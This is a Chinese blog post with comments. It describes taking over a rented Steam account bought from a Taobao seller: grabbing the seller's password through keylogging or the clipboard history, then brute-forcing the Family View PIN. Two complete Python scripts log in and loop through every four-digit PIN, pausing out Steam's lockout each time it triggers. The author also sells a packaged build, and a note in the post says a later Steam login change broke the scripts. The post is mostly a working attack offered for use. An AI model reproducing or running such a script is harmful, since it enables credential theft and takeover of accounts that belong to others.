Steam家庭监护爆破
浏览 13525 | 评论 56 | 字数 10925
卖女孩的小火柴 - 搬砖中
2020年01月04日
我去淘宝买了一个游戏的Steam离线版,实际上就是给你个账户下载安装后以离线模式运行,配合上Steam账户管理器玩起来感觉还是很不错的
但我总是对客户端上的 家庭监护 标志耿耿于怀...
失效
已确认 Steam 更换了登录算法,本文的脚本失效。
怎么搞到账户密码?
对很多店来说,他们不愿意把账户密码给你,更愿意直接远程,然后输入账户和密码,全部设置好后给设置为离线模式。
这个其实很好搞,Steam本身保护并不是非常到位,你可以采取记录键盘的方式记录下输入的密码,如果遇到和我一样偷懒复制粘贴的店家,你只需要借助Win自带的剪贴板历史(Win徽标+V)打开后就可以看到复制来的账户和密码啦~~~
怎么搞到家庭监护的Key?
Steam客户端和Steam网页都会被监护影响,经过测试,无论是客户端还是网页,都是输错5次暂停3分钟输入,那当然选择网页折腾啦~~
抓包的过程也很简单,需要注意的是,有个参数是附在网页中传递来的,需要取出来,然后遇到错误暂停3分钟继续咯。。。
rsa.js.zip
下面是脚本:
- # !/user/bin/env python
- # -*- coding:utf-8 -*-
- # time: 2018/9/6--19:24
- __author__ = 'Henry'
- # I use his login code ,thx him
- __sauthor__ = 'zponds'
-
- '''
- Steam login (RSA)
- URL:https://store.steampowered.com/login/
- '''
-
- import requests
- import time
- import re
- import execjs
- import json
-
- def steam_login():
- req = requests.session()
- headers = {
- 'Referer': 'https://store.steampowered.com/login/',
- 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
- Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
- }
- url = 'https://store.steampowered.com/login/getrsakey/'
- data = {
- 'donotcache': str(int(time.time() * 1000)),
- 'username': user
- }
- html = req.post(url, data=data, headers=headers).json()
- pub_mod = html.get('publickey_mod')
- pub_exp = html.get('publickey_exp')
- timestamp = html.get('timestamp')
-
- with open('rsa.js', encoding='utf-8') as f:
- jsdata = f.read()
- passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
- print(passencrypt)
- # login
- url = 'https://store.steampowered.com/login/dologin/'
- data = {
- 'donotcache': str(int(time.time() * 1000)),
- 'username': user,
- 'password': passencrypt,
- 'twofactorcode': '',
- 'emailauth': '',
- 'loginfriendlyname': '',
- 'captchagid': '-1',
- 'captcha_text': '',
- 'emailsteamid': '',
- 'rsatimestamp': timestamp,
- 'remember_login': 'false',
- }
- html = req.post(url, data=data, headers=headers).json()
- if html.get('emailauth_needed') == True:
- print('Login requires your email verification code')
- emailid = html.get('emailsteamid')
- email = input('Please enter your email verification code:')
- # login again
- data['emailauth'] = email
- data['emailsteamid'] = emailid
- html = req.post(url, data=data, headers=headers).json()
- print(html)
- if html.get('login_complete') == True and html.get('success') == True:
- print('logining...')
- url_store = 'https://store.steampowered.com/'
- html = req.get(url_store, headers=headers).text
- username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
- print('[Success!Username:' + username + ']')
- r = req.get('https://store.steampowered.com/parental/blocked')
- if '/parental/unlock' in r.text:
- print('The account has a family view')
- sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
- success = False
- start = input('PIN from:')
- start_time = int(time.time())
- for pin in range(int(start) - 1, 10000):
- flag = True
- while flag:
- # 取出sessionID
- pin_str = str(pin)
- while len(pin_str) < 4:
- pin_str = "0" + pin_str
- data = {
- 'pin': pin_str,
- 'sessionid': sessionID
- }
- try:
- r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
- headers=headers)
- r_json = json.loads(r.text)
- if r_json['success'] == False:
- if 'wait a while' in r_json['error_message']:
- print('Sleep...')
- time.sleep(180)
- r = req.get('https://store.steampowered.com/parental/blocked')
- sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
- else:
- flag = False
- print("PIN: %s: %s" % (pin_str, r_json['error_message']))
- else:
- print("PIN: %s: SUCCESS!" % pin_str)
- end_time = int(time.time())
- print("Time: %ds" % (end_time-start_time))
- success = True
- except BaseException as e:
- print('Error...')
- time.sleep(10)
- if success:
- exit(0)
- else:
- print('The account does not have a family view')
- else:
- print('login fail...')
- elif html.get('success') == False and html.get('message') != '':
- print(html.get('message'))
- print('login fail...')
-
-
- if __name__ == '__main__':
- user = input('account:')
- password = input('password:')
- steam_login()
0000-9999 Pin 3分钟可以尝试5次,运气再差也就2-3天的事情吧~找台服务器放着就好啦~
搞到KEY之后?
解除掉家庭监护就可以添加家庭共享啦~
接下来这个账户的使用权就属于你啦~
什么?不会运行Python?
没有关系,我已经准备好了一个WINDOWS开箱即用的版本了!购买附件,下载后可以直接使用!
同时附赠一次指导!
2020年3月18日更新
- 掉线后会自动尝试重新登录
- 结束后会要求输入EXIT以退出
- BUG修复
- 当然,编译的WINDOWS文件也更新了
- # !/user/bin/env python
- # -*- coding:utf-8 -*-
- # time: 2018/9/6--19:24
- __author__ = 'Henry'
- # I use his login code ,thx him
- __sauthor__ = 'zponds'
-
- '''
- Steam login (RSA)
- URL:https://store.steampowered.com/login/
- '''
-
- import requests
- import time
- import re
- import execjs
- import json
-
- def steam_login(open_start=-1):
- req = requests.session()
- headers = {
- 'Referer': 'https://store.steampowered.com/login/',
- 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
- Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
- }
- url = 'https://store.steampowered.com/login/getrsakey/'
- data = {
- 'donotcache': str(int(time.time() * 1000)),
- 'username': user
- }
- html = req.post(url, data=data, headers=headers).json()
- pub_mod = html.get('publickey_mod')
- pub_exp = html.get('publickey_exp')
- timestamp = html.get('timestamp')
-
- with open('rsa.js', encoding='utf-8') as f:
- jsdata = f.read()
- passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
- # print(passencrypt)
- # login
- url = 'https://store.steampowered.com/login/dologin/'
- data = {
- 'donotcache': str(int(time.time() * 1000)),
- 'username': user,
- 'password': passencrypt,
- 'twofactorcode': '',
- 'emailauth': '',
- 'loginfriendlyname': '',
- 'captchagid': '-1',
- 'captcha_text': '',
- 'emailsteamid': '',
- 'rsatimestamp': timestamp,
- 'remember_login': 'true',
- }
- html = req.post(url, data=data, headers=headers).json()
- if html.get('emailauth_needed') == True:
- print('登陆需要邮箱验证码...')
- emailid = html.get('emailsteamid')
- email = input('请输入验证码:')
- # login again
- data['emailauth'] = email
- data['emailsteamid'] = emailid
- html = req.post(url, data=data, headers=headers).json()
- # print(html)
- if html.get('login_complete') == True and html.get('success') == True:
- print('logining...')
- url_store = 'https://store.steampowered.com/'
- html = req.get(url_store, headers=headers).text
- username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
- print('[登陆成功!用户名:' + username + ']')
- r = req.get('https://store.steampowered.com/parental/blocked')
- if '/parental/unlock' in r.text:
- print('这个账户存在家庭监护')
- sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
- success = False
- if open_start == -1:
- start = input('从多少开始PIN(第一次运行请从0000开始):')
- else:
- start = open_start
- start_time = int(time.time())
- for pin in range(int(start) - 1, 10000):
- flag = True
- while flag:
- # 取出sessionID
- pin_str = str(pin)
- while len(pin_str) < 4:
- pin_str = "0" + pin_str
- data = {
- 'pin': pin_str,
- 'sessionid': sessionID
- }
- try:
- r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
- headers=headers)
- if len(r.text) > 2000:
- return steam_login(pin)
- r_json = json.loads(r.text)
- if r_json['success'] == False:
- if 'wait a while' in r_json['error_message'] or '错误尝试' in r_json['error_message']:
- print('等待中...')
- time.sleep(180)
- r = req.get('https://store.steampowered.com/parental/blocked')
- sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
- else:
- flag = False
- print("PIN: %s: %s" % (pin_str, r_json['error_message']))
- else:
- print("PIN: %s: 成功!" % pin_str)
- end_time = int(time.time())
- print("Time: %ds" % (end_time-start_time))
- success = True
- except BaseException as e:
- print('Error...')
- time.sleep(10)
- if success:
- return
- else:
- print('您的账户不存在家庭监护!')
- else:
- print(html.get('message'))
- print('登陆失败...')
-
-
- if __name__ == '__main__':
- user = input('账户名:')
- password = input('密码:')
- print('注意,跑PIN耗时可能非常长...可能长达两天...')
- steam_login()
- end = input('输入 EXIT 以退出...')
- while end != 'EXIT':
- end = input('输入 EXIT 以退出...')
本文作者:卖女孩的小火柴 - 搬砖中
本文链接:https://www.shinenet.cn/archives/82.html
最后修改时间:2023-12-19 21:53:36
本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!
评论
如果可能,请填写真实邮箱,有回复会送至邮箱。请不要水评论,谢谢。
评论列表
已有 56 条评论
这个是直接做了前端逆向,模拟了浏览器
换个号加吧